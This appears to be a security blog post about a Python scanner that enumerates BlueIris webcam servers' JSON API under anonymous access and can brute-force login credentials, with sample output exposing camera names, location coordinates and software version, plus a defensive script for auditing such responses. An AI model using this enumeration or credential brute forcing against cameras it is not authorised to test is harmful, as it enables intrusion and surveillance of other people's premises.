BlueIris Scanner


BlueIris Security is a software company that develops video security and webcam software to livestream data from your security cameras. After discovering a BlueIris webcam at a previous job, I started poking around with the web interface to see what I could discover when anonymous access was enabled. I wrote a simple scanner in Python that (assuming anonymous access is enabled) will run through various endpoints using their JSON HTTP interface and print out the results.

To learn how the interface worked, I read through the (beautiful) documentation on their website that details how the software works, how to configure it, and how the API is set up. Each command, the input parameters, and output are included in nice little tables.

When anonymous access is enabled, the interface returns information such as camera names, CPU and memory stats, last software update, number of current connections, disk usage and capacity, and server uptime. Although this is only informational, it gives an unauthenticated visitor a clearer picture of the environment.
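For whoever runs the server, the same responses can be read as an exposure report. The following is an added example, not part of the author's scanner: it parses captured responses of the shape shown in the example output on this page and lists what an unauthenticated session was given. The function names are hypothetical, the sample data is cut down from the page's output, and the rule for skipping group entries is a heuristic inferred from that output.

```python
import json

# Constructed sample: a trimmed copy of the login response shown in the
# example output on this page (stream and sound lists left out).
SAMPLE_LOGIN = """{"result": "success", "session": "5ee505ab704065d71007042d2aa5339a",
 "data": {"system name": "Home", "admin": false, "ptz": true, "audio": true,
 "clips": true, "version": "4.8.6.3", "support": "8/24/2019 5:32:39 PM",
 "user": "Anonymous", "latitude": 30.000000, "longitude": -97.000000,
 "profiles": ["Inactive", "Profile 1"], "schedules": ["Default"]}}"""

# Constructed sample: three entries cut down from the 'camlist' output.
SAMPLE_CAMLIST = """{"result": "success", "data": [
 {"optionDisplay": "+All cameras", "optionValue": "Index", "group": ["Cam2", "Cam6"]},
 {"optionDisplay": "Gate", "optionValue": "Cam2", "ptz": false, "isRecording": true,
  "isOnline": true, "nClips": 1059},
 {"optionDisplay": "My Camera 6", "optionValue": "Cam6", "ptz": true,
  "isRecording": false, "isOnline": true, "nClips": 288}]}"""

def audit_login(raw):
    """Hypothetical helper: findings for a login response obtained without credentials."""
    resp = json.loads(raw)
    data = resp.get("data")
    if resp.get("result") != "success" or not isinstance(data, dict):
        return []  # no session was granted, so nothing is exposed
    findings = [f"session issued to user {data.get('user')!r} without credentials"]
    if "version" in data:
        findings.append(f"software version disclosed: {data['version']}")
    if "latitude" in data and "longitude" in data:
        findings.append(f"site location disclosed: {data['latitude']}, {data['longitude']}")
    # Capability flags the server reports as true for this session.
    granted = [k for k in ("admin", "ptz", "audio", "clips") if data.get(k) is True]
    findings.append("capabilities granted: " + (", ".join(granted) or "none"))
    return findings

def audit_camlist(raw):
    """Hypothetical helper: (name, id, ptz, recording) per camera in a camlist response."""
    resp = json.loads(raw)
    cams = resp.get("data") if resp.get("result") == "success" else None
    out = []
    for cam in cams or []:
        # Heuristic from the sample output: group and cycle entries are not cameras.
        if "group" in cam or str(cam.get("optionValue", "")).startswith("@"):
            continue
        out.append((cam.get("optionDisplay"), cam.get("optionValue"),
                    bool(cam.get("ptz")), bool(cam.get("isRecording"))))
    return out

if __name__ == "__main__":
    print(*audit_login(SAMPLE_LOGIN), *audit_camlist(SAMPLE_CAMLIST), sep="\n")
```

An empty list from `audit_login` means the server refused the unauthenticated session, which is the result to aim for on an Internet-facing install.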

The scanner also has the ability to brute force credentials, since traditional brute forcing tools (like Hydra) don’t support their unique login API. When files of possible passwords and usernames are provided, it will test each combination until a valid password is found.

Python Scanner

Link to the scanner on GitHub

Example

$ python3 blueiris_compromise.py -H http://0.0.0.0:80
[+] No paths to text file of usernames and passwords was passed in. Admin access will not be brute forced.

[+] Testing anonymous access...
[+] SUCCESS! Anonymous access is permitted
{"result": "success", "session": "5ee505ab704065d71007042d2aa5339a", "data": {"system name": "Home", "admin": false, "ptz": true, "audio": true, "clips": true, "streamtimelimit": false, "dio": false, "version": "4.8.6.3", "support": "8/24/2019 5:32:39 PM", "user": "Anonymous", "latitude": 30.000000, "longitude": -97.000000, "tzone": "0", "streams": ["CBR 512 kbps; gop 300, bframe 0", "CBR 1024 kbps; gop 300, bframe 0", "CBR 256 kbps; gop 300, bframe 0"], "sounds": ["airhorn.wav", "alarm-frenzy.wav", "alarm.wav", "alarming.wav", "alien-message.wav", "alien-tune.wav", "are-you-kidding.wav", "attention-required.wav", "blocker.wav", "decay.wav", "demonstrative.wav", "determined.wav", "doorbell.wav", "enough-with-the-talking.wav", "gentle-alarm.wav", "gesture.wav", "good-morning.wav", "hell-yeah.wav", "high-pitch.wav", "i-demand-attention.wav", "i-saw-you.wav", "job-done.wav", "just-like-magic.wav", "long-chime-sound.wav", "may-i-have-your-attention.wav", "munchausen.wav", "news-bringer.wav", "no-way.wav", "not-kiddin.wav", "oh-really.wav", "on-serious-matters.wav", "paranoid.wav", "pizzicato.wav", "police.wav", "pop.wav", "professionals.wav", "quiet-knock.wav", "robot-walking.wav", "served.wav", "sorted.wav", "springy.wav", "surprise-on-a-spring.wav", "system-fault.wav", "the-squeaky-wheel-gets-the-grease.wav", "this-is-it.wav", "warning.wav", "what.wav", "wiggle.wav", "will-you.wav", "you-wouldnt-believe.wav"], "www_sounds": ["airhorn.mp3", "alarm-frenzy.mp3", "alarm.mp3", "alarming.mp3", "alien-message.mp3", "alien-tune.mp3", "are-you-kidding.mp3", "attention-required.mp3", "blocker.mp3", "decay.mp3", "demonstrative.mp3", "determined.mp3", "doorbell.mp3", "enough-with-the-talking.mp3", "gentle-alarm.mp3", "gesture.mp3", "good-morning.mp3", "goodbye.mp3", "hail.mp3", "hell-yeah.mp3", "high-pitch.mp3", "i-demand-attention.mp3", "i-saw-you.mp3", "job-done.mp3", "just-like-magic.mp3", "long-chime-sound.mp3", "may-i-have-your-attention.mp3", "munchausen.mp3", 
"news-bringer.mp3", "no-way.mp3", "not-kiddin.mp3", "oh-really.mp3", "on-serious-matters.mp3", "paranoid.mp3", "pizzicato.mp3", "police.mp3", "pop.mp3", "professionals.mp3", "quiet-knock.mp3", "robot-walking.mp3", "served.mp3", "sorted.mp3", "springy.mp3", "surprise-on-a-spring.mp3", "system-fault.mp3", "the-squeaky-wheel-gets-the-grease.mp3", "this-is-it.mp3", "warning.mp3", "what.mp3", "wiggle.mp3", "will-you.mp3", "you-wouldnt-believe.mp3"], "profiles": ["Inactive", "Profile 1", "Profile 2", "Profile 3", "Profile 4", "Profile 5", "Profile 6", "Profile 7"], "schedules": ["Default"]}}

[+] Enumerating endpoints accessible with anonymous access...
[+] Command 'camlist' returned successfully:
{"result": "success", "session": "5ee505ab704065d71007042d2aa5339a", "data": [{"optionDisplay": "+All cameras", "optionValue": "Index", "FPS": 10.0, "isMotion": false, "isTriggered": false, "xsize": 3, "ysize": 2, "width": 1920, "height": 720, "audio": true, "group": ["ptz", "Cam6", "Cam5", "Cam2", "Cam1", "cam3"], "rects": [[0, 0, 640, 360], [640, 0, 1280, 360], [1280, 0, 1920, 360], [37, 360, 677, 720], [752, 360, 1280, 720], [1355, 360, 1883, 720]], "newalerts": 0, "lastalert": -1, "alertutc": 0}, {"optionDisplay": "+All cameras cycle", "optionValue": "@Index", "type": 4, "FPS": 10.0, "color": 0, "ptz": false, "audio": true, "width": 1280, "height": 720, "isEnabled": true, "isOnline": true, "profile": 1, "pause": 0, "isPaused": false, "isRecording": false, "isYellow": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 0, "nClips": 0, "nNoSignal": 0, "error": "", "isMotion": false, "isTriggered": false}, {"optionDisplay": "ptz", "optionValue": "ptz", "active": true, "FPS": 14.88, "color": 8151097, "ptz": true, "audio": false, "width": 1920, "height": 1080, "newalerts": 29, "lastalert": 3629572, "alertutc": 1681914410, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": false, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 1476, "nClips": 227, "nNoSignal": 2891, "error": ""}, {"optionDisplay": "My Camera 6", "optionValue": "Cam6", "active": true, "FPS": 14.88, "color": 8151097, "ptz": true, "audio": false, "width": 1920, "height": 1080, "newalerts": 2, "lastalert": 3462763, "alertutc": 1681910733, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": false, "isManRec": 
false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 3522, "nClips": 288, "nNoSignal": 2635, "error": ""}, {"optionDisplay": "My Camera 5", "optionValue": "Cam5", "active": true, "FPS": 14.95, "color": 8151097, "ptz": true, "audio": false, "width": 1920, "height": 1080, "newalerts": 2, "lastalert": 3484058, "alertutc": 1681910737, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": false, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 5402, "nClips": 366, "nNoSignal": 2874, "error": ""}, {"optionDisplay": "Gate", "optionValue": "Cam2", "active": true, "FPS": 14.89, "color": 8151097, "ptz": false, "audio": false, "width": 2560, "height": 1440, "newalerts": 81, "lastalert": 3827063, "alertutc": 1681921237, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": true, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 14925, "nClips": 1059, "nNoSignal": 3168, "error": ""}, {"optionDisplay": "Dee's", "optionValue": "Cam1", "active": true, "FPS": 24.99, "color": 8151097, "ptz": false, "audio": false, "width": 352, "height": 240, "newalerts": 22, "lastalert": 3611960, "alertutc": 1681914402, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": true, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": 
false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 9898, "nClips": 690, "nNoSignal": 343, "error": ""}, {"optionDisplay": "Overview", "optionValue": "cam3", "active": true, "FPS": 25.67, "color": 8151097, "ptz": false, "audio": false, "width": 704, "height": 480, "newalerts": 0, "lastalert": -1, "alertutc": 0, "webcast": true, "isEnabled": true, "isOnline": true, "hidden": false, "tempfull": false, "type": 4, "profile": 1, "lock": 0, "pause": 0, "isPaused": false, "isRecording": true, "isManRec": false, "ManRecElapsed": 0, "ManRecLimit": 0, "isYellow": false, "isMotion": false, "isTriggered": false, "isNoSignal": false, "isAlerting": false, "nAlerts": 0, "nTriggers": 0, "nClips": 458, "nNoSignal": 322, "error": ""}]}
[+] A valid camera name will be used in some subsequent requests
[+] Command 'alertlist' returned successfully:
{"result": "success", "session": "5ee505ab704065d71007042d2aa5339a", "data": [{"camera": "Cam2", "newalerts": 81...